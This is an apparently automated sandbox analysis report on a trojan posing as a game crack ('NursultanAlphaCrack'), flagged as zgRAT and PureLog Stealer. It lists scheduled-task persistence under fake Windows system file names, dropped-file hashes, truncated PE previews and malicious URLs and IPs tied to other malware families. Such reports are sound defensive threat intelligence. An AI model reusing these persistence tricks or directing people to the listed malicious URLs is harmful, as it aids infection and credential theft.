                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Sample name:NursultanAlphaCrack.bat.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.expl.evad.winEXE@58/78@3/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, RuntimeBroker.exe, smss.exe, SIHClient.exe, schtasks.exe
                                                                  • Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.175.87.197, 20.242.39.171, 20.109.210.53
                                                                  • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target BlockcontainerWin.exe, PID 7932 because it is empty
                                                                  • Execution Graph export aborted for target smss.exe, PID 5888 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  TimeTypeDescription
                                                                  07:16:59API Interceptor173x Sleep call for process: powershell.exe modified
                                                                  07:17:13API Interceptor1x Sleep call for process: smss.exe modified
                                                                  07:17:21API Interceptor1x Sleep call for process: GKcQVcpwHdHgqKNzncXgLOYQsT.exe modified
                                                                  12:16:57Task SchedulerRun new task: BlockcontainerWin path: "C:\portsurrogateFontCrt\BlockcontainerWin.exe"
                                                                  12:16:57Task SchedulerRun new task: BlockcontainerWinB path: "C:\portsurrogateFontCrt\BlockcontainerWin.exe"
                                                                  12:16:57Task SchedulerRun new task: GKcQVcpwHdHgqKNzncXgLOYQsT path: "C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe"
                                                                  12:16:57Task SchedulerRun new task: GKcQVcpwHdHgqKNzncXgLOYQsTG path: "C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe"
                                                                  12:16:58Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe"
                                                                  12:16:58Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe"
                                                                  12:16:59Task SchedulerRun new task: smss path: "C:\Program Files\Windows NT\smss.exe"
                                                                  12:16:59Task SchedulerRun new task: smsss path: "C:\Program Files\Windows NT\smss.exe"
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.80.1QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.masterqq.pro/vfw3/
                                                                  NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                  • www.aziziyeescortg.xyz/2pcx/
                                                                  qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                  • www.mzkd6gp5.top/0hqe/
                                                                  6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                  • clientservices.sgoogleapis.observer/api/index.php
                                                                  http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26desusertion%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                  • my.cradaygo.com/smmylet
                                                                  SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dejikenkyu.cyou/pmpa/
                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                  • hiranetwork.com/administrator/index.php
                                                                  downloader2.htaGet hashmaliciousXWormBrowse
                                                                  • 2k8u3.org/wininit.exe
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  s-part-0017.t-0009.fb-t-msedge.nethttps://sites.google.com/view/01-25sharepoint/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.253.45
                                                                  YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.45
                                                                  setup64v.2.9.7.msiGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.45
                                                                  https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.45
                                                                  17367113452957edfc9b8ae3ec34b8a6a9089df6f896f271bbf1399203c8025fd6cb0731fa872.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.45
                                                                  VlY57c5AF4.exeGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.45
                                                                  wN7EPNiHSM.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.107.253.45
                                                                  http://infarmbureau.comGet hashmaliciousUnknownBrowse
                                                                  • 13.107.253.45
                                                                  32474162872806629906.jsGet hashmaliciousStrela DownloaderBrowse
                                                                  • 13.107.253.45
                                                                  0Ie2kYdPTW.exeGet hashmaliciousFormBookBrowse
                                                                  • 13.107.253.45
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSrecode.exeGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.21.16.1
                                                                  MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.112.1
                                                                  RFQ PC25-1301 Product Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.21.80.156
                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.32.1
                                                                  SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.112.1
                                                                  https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                  • 104.19.132.76
                                                                  PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.32.1
                                                                  https://smartbooking.ma/Get hashmaliciousUnknownBrowse
                                                                  • 188.114.97.3
                                                                  FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\Desktop\BAOTDPUV.logSearchIndexer.exeGet hashmaliciousDCRat, Neshta, PureLog Stealer, zgRATBrowse
                                                                    fatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      OneDriveStandaloneUpdater.exeGet hashmaliciousDCRatBrowse
                                                                        85D5ktqjpd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          VIyu4dC9CU.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            top.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              DC86.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                WinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with very long lines (363), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):363
                                                                                      Entropy (8bit):5.828280279985632
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Gfyr8hUGk2ySh3YuUVyTphooLBZwGNYwQVK/hl1TNGTWhJVi40FS:Gf4wySpqc7IWDQVQ0u0FS
                                                                                      MD5:E124D736399933B913803DA3E12E261D
                                                                                      SHA1:E8D70EC6F7C38221ED61A5F5E2155766E4BFD4CF
                                                                                      SHA-256:B45E49D32899D6CDC5B9D94A749681D4ED4D8AF740655B0C8F4116D3DE3DC701
                                                                                      SHA-512:BEB9E44A4772C37B5FDCCB0DCC90556F91CFD5A563124AEDA30D1A7D7E7EA1EBFDC90766E11927F11032D4771D017872E2B6FF86E3073C25F58CBA480634A1E1
                                                                                      Malicious:false
                                                                                      Preview:KpEtYzEIhy7Y6NwDkX1DgrcUtS191rSzrMcQt02G4rBw4AQcY829Ku0cNu9F8EQzgIruufUtevIypqatCYl3ySo6W9D91wIzaMQvTgs3nJeZlBxgUQDjdWANeuYvbU2smSXdaoZfpsPpyOUUMgpktiWELCRjI7bSQwwTnTGp1h4vHVZPZDi4pS9E6TSXX0XsQ6YBbBq2aAtLok6zmBJEYhn8xsWUBtRAJLfK6XyXWqepjxaWWdvWqSUtTaOtpW1rssBcFw2ONvssC7Z9S97i75T01v0gJEsAzx60v7RjkgI5klqWBOapYTtxYKlT6WFIDr3PAiNVsY7bwYQPEdf4oCmfEJclV7mObA13sbVcBF7
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2545152
                                                                                      Entropy (8bit):7.696493390112077
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
                                                                                      MD5:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      SHA1:ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
                                                                                      SHA-256:E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
                                                                                      SHA-512:67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y*.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......|.......................V.&......................................0..........(.... ........8........E....)...N...*.......8$...(.... ....~f...{i...:....& ....8....*(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z*....~....(
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with very long lines (668), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):668
                                                                                      Entropy (8bit):5.88110378628582
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:WJT0lnd1opuMLC62uioI4DBQrxgywZ2Deqhjjr6lv2fBRj5k/eAdXc+:Wd0lnd1iuMLCmRDDyYqJjrJK/Jc+
                                                                                      MD5:1EF14FBB32CCBD59EC1A2EDB74395156
                                                                                      SHA1:5C8319E24C2888C3E927559AEA46FEE76FF03726
                                                                                      SHA-256:00076FD18712FA7B1DDE34136D9391DE355DEF0D089BF374A0DA0687BF52BEBB
                                                                                      SHA-512:B03877BEE270F4B648F56326805E983468ECF954B68E3FCECEDE960A5418BA21D72B005DBE05272C77C3486349E01D1F82E53E81AB961EC895014D66E5D1C5CD
                                                                                      Malicious:false
                                                                                      Preview:DQf9NDGlvTIpBsmgOPDFo4SB4r98wc1x7ecVquh63nHUrcySA5B68mAJ7eFfDHyScUrgQQzdsHMBw8Tb3r81b4yVdTYMpB2vyz1XuRCtGiO1a9W8KnmWI70hfWD72mxqPaM6G6qloPv3q74e6ZCCZfn18U1YOF0duim9wa1N6Ar3L71hbiBdjvQtxV7wFSXjYSIHV5rghzGZxtpBdT6pEX39R2LacFHnnIe3ytMg1e5uo15Ep6SvWrfBYJzcuQDcrcvpOwMtHayjbIUa6HufwWR5mdeo3twkbdDLFQz3tjo636kPzZfmfhpVLzCvRhzXoOI7FIUqS1wNrVCq3PzeOJE3ysAPNDmMtRRpymKqEzUovcn0xW2CsVIeJOJWIFcOOjdZDX1REJZZzZHWEJc1LkdXIxfjcxi9WFZL8NxZfl7i5tptHxR8mlDoFGQP2RyQkaCtA5X1WCWkm5bZHvcpgjWvCuF26hhNwq8fr6tMZamkPdBKo1IGzJuBERqPzf4zfJx576sLBPPF7vgjt5OFZaXn66aZPeW4gxEGpFNrJ7Fj3oDSvHg4RyZEvK9AgS5g3VjKrZ3nrg5cVxtR2IoI8cnrXAUfGNL1BiqiE3lVN2Nu27t8arHYnxiar1xqFYgdVEawGKN8gT4FP2yZRWEYFwNNAQ1N
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2545152
                                                                                      Entropy (8bit):7.696493390112077
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
                                                                                      MD5:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      SHA1:ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
                                                                                      SHA-256:E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
                                                                                      SHA-512:67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\smss.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y*.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......|.......................V.&......................................0..........(.... ........8........E....)...N...*.......8$...(.... ....~f...{i...:....& ....8....*(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z*....~....(
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):40
                                                                                      Entropy (8bit):4.753055907333276
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:++Wz0xUQuBcy:40xOqy
                                                                                      MD5:50A840A00A24A4D2D3C1DD97E2B28A0A
                                                                                      SHA1:F2A9733CFBE96DEC3B5F40AD86EB596567DFD89A
                                                                                      SHA-256:85441B9CAE32F3D155E7C8CC75E2877EF2E2040FC5D48DF6E441D91D62AF8922
                                                                                      SHA-512:89C25FC72A3061629DF1F43E7CEAAB1E9BBDEE15DB5DC4C9B44D96D28537B7F8F22D7FFA3A81B08872A3DFF734C8D88470C98835EAD39154D915A47DCFBC6EEA
                                                                                      Malicious:false
                                                                                      Preview:sez4ezs2LnxCVQEMJfhK3Lp1fim6ykQ59zil1ZMp
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2545152
                                                                                      Entropy (8bit):7.696493390112077
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
                                                                                      MD5:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      SHA1:ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
                                                                                      SHA-256:E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
                                                                                      SHA-512:67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y*.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......|.......................V.&......................................0..........(.... ........8........E....)...N...*.......8$...(.... ....~f...{i...:....& ....8....*(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z*....~....(
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with very long lines (913), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):913
                                                                                      Entropy (8bit):5.883258522334689
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:fxhVhaElB688Ru3rc8YnwuUvKtG617dYA3cDc3/Urm:PT8mNTuUvKth7qcvUrm
                                                                                      MD5:1513D173E3BB43D7D3705C1BDFA219C4
                                                                                      SHA1:AE833A14451C4D044ACC71991A2BB646434134F1
                                                                                      SHA-256:F968BA6CD6699BDF47829921BB9AC27FF4A7798BC7655794F439C81FC90D7073
                                                                                      SHA-512:68B8EF6C05E94B048F5D3DCEA4F61A37D697B04647027F504001FF47605B7E0D19AF98655FD2BEAB9ED08A8447C27E69BAB3F50623D5CA5295F7AFE309D19EBB
                                                                                      Malicious:false
                                                                                      Preview:WOd1KeBEXK1Fm9uvt9vgWgmHC3iFmKwIdq9tJXRg0yVReXYGMOlSPdhzlVyR55cMYsm59BlWsPpiLVmoeb2Xid29IJHyi9k5VI2vudGKnPk9x9oPsJweCEn50mw04wxspuMCd04AVsuT23MIf1GYMG2Qe65IqQQ0b2UCxmw1PvIUUUC6ZoUCqZfj25hg5vUEc31AjJV3FOIa7h6K48sC5NKCWuK2EP6ebD2bcBXQSb7bQEmU9Wm6DSJPtzoy9cyzSo93per2lctePsvSIz2rnAaI4nsnXiRznHJlEspeptUljo9ADWqJkGMRO08CwEfCK30HiKNZKYC3pzjQnrjB2HPh52XNumrlOSaqy1c3IQ9LDSmYRsYFeeJDnTMqw9phqbpXZ3cwPp2lHEdnP96BOmGuIWCepvHJlcfmmO9YQm0zli5jziaxCnTDV5PC07HdisApi1BB9ivmwQIkbdpGVTG8JbQq96hTeWQ2hQA7hZxe1qRExolWRAIOlCgHkUBCAcHZ9PCLdrj5gmGcJM3VVLBdOCQft2WMXudZj1Ehla2jbMs96D7YaqrzanL78hblUXivJq3SIWt5SbCBTRiq48vrDo85qGiE8RPEo60PKpPE7vh9lJnq8vqVl1rfs8lBxp6AM8WXbTfPtqtRG9Tgc1FNl3cxOVhMENRSygwnxQPpPbm4HaYsoFi5jsZTfjIGwTLfZbcjMqtMma8KQiqy6yh8pVsGHdIOIJ35QHeq7yg8VWTJuPC62TJ7wM0EsWcthfDchC4JD91IRimSBjV2aLVz95JDQa7kWxa0T0mrV332bBqNjiCJBjSWJOdl302mCRveHv9L6ohhRcY8P5esXyjweEqFXAxeAQ0JPLFxj1MWCuEr0eW8WKPOs99DE3x60ChBlOtDzqJglMuu9
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2545152
                                                                                      Entropy (8bit):7.696493390112077
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
                                                                                      MD5:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      SHA1:ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
                                                                                      SHA-256:E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
                                                                                      SHA-512:67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y*.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......|.......................V.&......................................0..........(.... ........8........E....)...N...*.......8$...(.... ....~f...{i...:....& ....8....*(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z*....~....(
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with very long lines (470), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):470
                                                                                      Entropy (8bit):5.902133483460021
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:hwpTAcgFCixWnNfzEblBOlyvegD7S8vBt4:hiTApuaJBOlqesTt4
                                                                                      MD5:3C6E586AAEB8A46CF6DB337719AA6E87
                                                                                      SHA1:1C947D9B701DA184DBB057921BA745308ACEA68B
                                                                                      SHA-256:11CDF68A8460907A7B13746F4821522DB2DEA62D1F2356AF561449E87F8E1A91
                                                                                      SHA-512:294E83F99D7E95245B8114157E0FC8979912F9C3E6349CCC79A5CCAFC24A1CDD6CC13BA1A89F6C582AB1B3AE2901C7D9C0F62E2F46CF55E8661021D42B82FCDB
                                                                                      Malicious:false
                                                                                      Preview:YWXjE37DSXH4Y5PhtwKTOtas10RfR9L0a4HDHOwYrrGobCTXlhdyqCOo6osNlcvTMQeeyLaeAvlgmvRyh43tfXKYpcHcgiwP6wcKiyiaH9x4asBKX3qriByyGGyWE88c9Wj0SGQsWdmgjP76a6Em1Fq58nEcAMVIBV5EIL2Rn7VFYSP0I25I3Vk4po1oBxsKHdfOU2xOEx93tkgqYOTIQMPpuAZeUNPzPL84xAfQErEFVqKEIKQxdk34OzeUdT41iKoiml3XsDDiIJUDzUWJ6bVoRDq7gLwuxNhLCmcgR2FagUwEfaeJ7u4Hy9Rj551hQTv5mIAN1z2EW5I6QlcFrnxCSZXDV2kVBhJNj1cWaQRH10u30USUdv0nftmMv729OhCyv5XZJFpaVqKcodMAkQ1PrfrzPPlcXS2Ux6H573LXGZRziJhRv2Z8pxGQNhJ3eMCDx0psWQCqFeJSN1RFrU
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2545152
                                                                                      Entropy (8bit):7.696493390112077
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:gZP6vgp9kHCayPPLHCLXbX4pKXDys7yqmHji4Rn:goYp9kiHPbCfX4rsu3GQ
                                                                                      MD5:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      SHA1:ABF4CF8782F366A10DF36FF706AFEAFFD07DF514
                                                                                      SHA-256:E2D2A557CF97F4D81A7D476D3FB5E43405F6E79FE266032DD3D8650D6B81D846
                                                                                      SHA-512:67F987CA27548C3EF21E7C27990653E1443B0A761262EF2351BF1FD670903E7652E1A215A206B2FC197DBA33A661E762F410AB63B1605A2571C1872C75C78912
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y*.g..................&...........&.. ....'...@.. .......................@'...........@...................................&.K.....'. .................... '...................................................... ............... ..H............text...4.&.. ....&................. ..`.rsrc... .....'.......&.............@....reloc....... '.......&.............@..B..................&.....H.......|.......................V.&......................................0..........(.... ........8........E....)...N...*.......8$...(.... ....~f...{i...:....& ....8....*(.... ....~f...{....9....& ....8....(.... ....~f...{....:....& ....8y......0..'....... ........8........E........M.......)...............8....8.... ....~f...{v...:....& ....8....8t... ....~f...{....:....& ....8....~....(S... .... .... ....s....~....(W....... ....8\...~....9B... ....8H...r...ps....z*....~....(
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1915
                                                                                      Entropy (8bit):5.363869398054153
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4vb
                                                                                      MD5:63FDE44070DCD58C798C851711274955
                                                                                      SHA1:70F292AEC1D905E7B3875B457EFB6AB59666A9EE
                                                                                      SHA-256:11FE986688725A8BDA34D763C6BE6DBF4957CA1710603D111FBDFE7D7CB10DEE
                                                                                      SHA-512:E9DCC7BDB7895982206E6E3733D13B99E6B66F148AE44AF268AEF16BDBC752E05FDFD01F489EC7419403BB985E66A55A14A34523AE8DCE8B1077432524941DA5
                                                                                      Malicious:false
